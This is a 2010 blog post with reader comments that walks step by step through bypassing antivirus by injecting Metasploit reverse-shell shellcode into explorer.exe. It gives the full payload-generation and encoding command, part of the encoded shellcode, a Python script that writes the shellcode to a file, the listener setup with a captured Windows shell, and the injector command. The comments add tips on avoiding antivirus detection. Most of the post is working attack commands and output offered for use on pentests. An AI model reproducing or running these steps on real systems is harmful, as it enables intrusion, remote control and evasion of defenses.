Tuesday, August 17, 2010

Bypassing AntiVirus With Process Injection

There is a new tool for anti virus bypass which allows an attacker to inject shellcode into a process Post exploitation. Enabling the attacker to pass a shell to a remote location, generally i assume this would be a meterpreter shell for obvious reasons. Those of us who penetration test for a living are aware of the need to sometimes have a shell after obtaining gui system access. Buuuut Antivirus can be a real pain in the ass sometimes.


A few people came to me today saying they tried this new technique and it looked awesome but was not functioning correctly, below is a description of why it was not working for them and how to fix it.. here is a link for the program as reference.

https://sites.google.com/site/mamit30/home/injector

Videos are cool and all but as we know they tend to leave things out, in this case they left out the proper way to create shellcode. They also left out how to create the file to inject into the process, so below is a walkthrough without missing any details of how to get a shell by injecting into a process with injector... Honestly, I wish people who developed tools would not leave out details in their videos. I also wish they would learn to talk and explain things as they create the video rather then having a distracting song..

Mainly I believe the issues people were having are of bad character sets within their shellcode. (Although I did not verify this in a debugger, the crash behavior leans towards this assumption)

When you inject a payload into a process if any characters are bad such as a Null characters the process will automatically terminate or create undesired results, it doesn't always have to be null and all processes and programs are created differently depending what they are looking for.Encoding is a good way to solve these issues. So lets get to it!!

Original Video: http://vimeo.com/14139105

Issues people had:
-Injecting into Explorer.exe crashes the process... (explorer being a good process because it re-spawns)

Resolution:
-Alpha upper encoding
-using the py file to create raw code


So basically the problem people were having is that there are bad characters in their shellcode that were crashing the process, following is a step by step on how to use the antivirus bypass technique that the video does not show clearly and in its entirety....


1. First Create your shell-code: (Alpha upper encode the shellcode, and add a thread exit function)


root@Ficti0n:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 EXITFUNC=thread R | ./msfencode -e x86/alpha_upper

[*] x86/alpha_upper succeeded with size 699 (iteration=1)
buf =
"\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" +
..........
.................

The output from this will be very large but no worries size doesn't appear to be an issue....


2. Put this shell-code into the generic.py file like so (Remove all + signs and surround the output with parenthesis)


buffer=("\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
............
................. )

file=open("pgeneric.txt","w")
file.write(buffer)



3. Startup your multi-handler and after you receive the payload you will get a shell... (go to step 4 below to send off your payload.)

msf > use multi/handler
msf exploit(handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(handler) > set LPORT 4444
LPORT => 4444

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.10:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.3:2438) at Tue Aug 17 20:30:20 -0400 2010

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator> YAY FOR SHELL



4. Check your process list for Explorer.exe then ship off your payload into the process, this payload is now encoded to remove all bad characters and with your multi/handler running you should receive a shell no problem.


C:\Documents and Settings\Administrator\Desktop\injector>tasklist

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 244 K
smss.exe 620 Console 0 388 K
csrss.exe 668 Console 0 1,660 K
winlogon.exe 692 Console 0 5,152 K
services.exe 736 Console 0 4,312 K
lsass.exe 748 Console 0 1,544 K
vmacthlp.exe 904 Console 0 2,292 K
svchost.exe 920 Console 0 4,548 K
svchost.exe 1000 Console 0 4,012 K
svchost.exe 1092 Console 0 21,824 K
svchost.exe 1136 Console 0 3,060 K
svchost.exe 1212 Console 0 4,584 K
spoolsv.exe 1416 Console 0 5,476 K
sqlservr.exe 1800 Console 0 8,684 K
sqlwriter.exe 1948 Console 0 3,268 K
notepad++.exe  2104 Console                 0      3,072 K
notepad.exe 3612 Console                 0      3,388 K
explorer.exe 1568 Console                 0     22,064 K
tasklist.exe 1900 Console                 0      4,244 K
wmiprvse.exe 2708 Console                 0      5,404 K

C:\Documents and Settings\Administrator\Desktop\injector>injector.exe pgeneric.txt 1568

[*] Author: DouBle_Zer0
[*] HACKERS GARAGE Production
[*] Visit Us: http://www.garage4hackers.com


C:\Documents and Settings\Administrator\Desktop\injector> Your payload was just sent!! check your meterpreter


I hope that clears a few things up for anyone who was asking me how to utilize this tool on a pentest, this is an excellent technique and very neat but explanation of proper payloads and examples were lacking, I would have much preferred a written write up with more detail for reference so that is what i am providing..

Final Note:
Also one final note, you will notice i used the "explorer.exe" process, the reason I used explorer.exe because if I blow it up, it will respawn itself. Also a good technique when migrating processes in Meterpreter, if explorer.exe Fubars, you can just kill the process and it will respawn.  I have used this technique on processes running as a domain administrator to get full domain access. However when I blew up the process I lost access but was able to just respawn it and regain my foothold when no hashes or tokens were available.



.
.

7 comments:

  1. Silly question, doesn't the AV detect your injection attempt before you can run any shellcode?

    ReplyDelete
  2. I think the only way this would get detected by AV is if the injector program itself started being flagged by Antivirus, which is a pretty good likelihood in the future.
    The shellcode itself shouldn't flag anything because you are injecting it into a running process in memory and i dont believe the shellcode would flag AV anyway on its own in a txt file... Anyone can feel free to correct me if I am wrong... But I believe that is correct.

    So i just tossed the shellcode file in virus total and there is no hits, so the shellcode file should be safe from AV, I then threw up the injector program on to virustotal and 9 AV's out of 42 flagged it, Neither Mcafee or Symantic saw it which are the 2 big ones I am usually up against, a few others of note found it, kasperski and avast.

    Does that answer the question?

    ReplyDelete
  3. It has still failed. When I run it kills the process and the shellcode doesn't work :(

    ReplyDelete
  4. Hmmm thats the issue I was having before encoding, are you making sure to encode your shellcode and use the python script to create the file out of the shellcode? If so what encoding are you using?? Try alpha upper

    ReplyDelete
  5. As you uploaded the injector to virustotal, it will be detected by most AV in a short amout of time. ;)
    Kaspersky detects it since 08/11/2010 as Trojan.Win32.Vaklik.ikj.

    ReplyDelete
  6. Do you really think that AV can detect this tool.. means this tool only use legitimate API's if they release signature for this then this will create BIG false positive with windows applications. i consulted the same AV detection issue with the author. but he was saying that it is not possible to release the signature of Injector. however Av may release signature of HARD coded strings in Injector.. But this is not the solution. AV detect it because it is UPX packed (Exactly i don't know why) but author told me that just unpack the file with UPX. and it is working cool now.. i also discussed the shellcode issue with author he said that use "wb" instead of "w" in generic.py script. (infact this is not a txt file, the file is actually bin file (generated from generic.py), he said. although these things not effect the working of injector and we can use any shellcode and any encoder, this is also verified by me.

    /
    lx

    ReplyDelete

Learning Binary Ninja For Reverse Engineering and Scripting

 Recently added a new playlist with about 1.5 hours of Binary Ninja Content so far..    Video 1: I put this out a couple months ago covering...